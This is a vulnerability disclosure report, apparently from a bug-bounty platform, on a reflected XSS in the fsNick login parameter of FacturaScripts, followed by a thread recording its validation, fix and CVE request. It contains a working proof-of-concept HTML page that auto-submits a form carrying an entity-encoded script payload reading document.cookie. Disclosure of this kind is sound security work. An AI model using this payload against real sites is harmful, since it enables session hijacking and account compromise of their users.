Refelect XSS in facturascripts in neorazorx/facturascripts

Valid

Reported on

Apr 27th 2022


Description

facturascripts is vulnerable to XSS in fsNick parameter

Proof of Concept

save this code as poc.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/" method="POST">
      <input type="hidden" name="fsNick" value="1&apos;&quot;&#40;&#41;&amp;&#37;&lt;acx&gt;&lt;ScRiPt&#32;&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;ScRiPt&gt;" />
      <input type="hidden" name="fsPassword" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

open file with your browser -> xss trigger

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. 2 years ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back 2 years ago
Carlos Garcia validated this vulnerability 2 years ago
minhnb11 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia marked this as fixed in 2022.06 with commit 73a659 2 years ago
The fix bounty has been dropped
Minh
2 years ago

Researcher


@admin Can you assign CVE for this report?

Jamie Slome
2 years ago

Sorted 👍

to join this conversation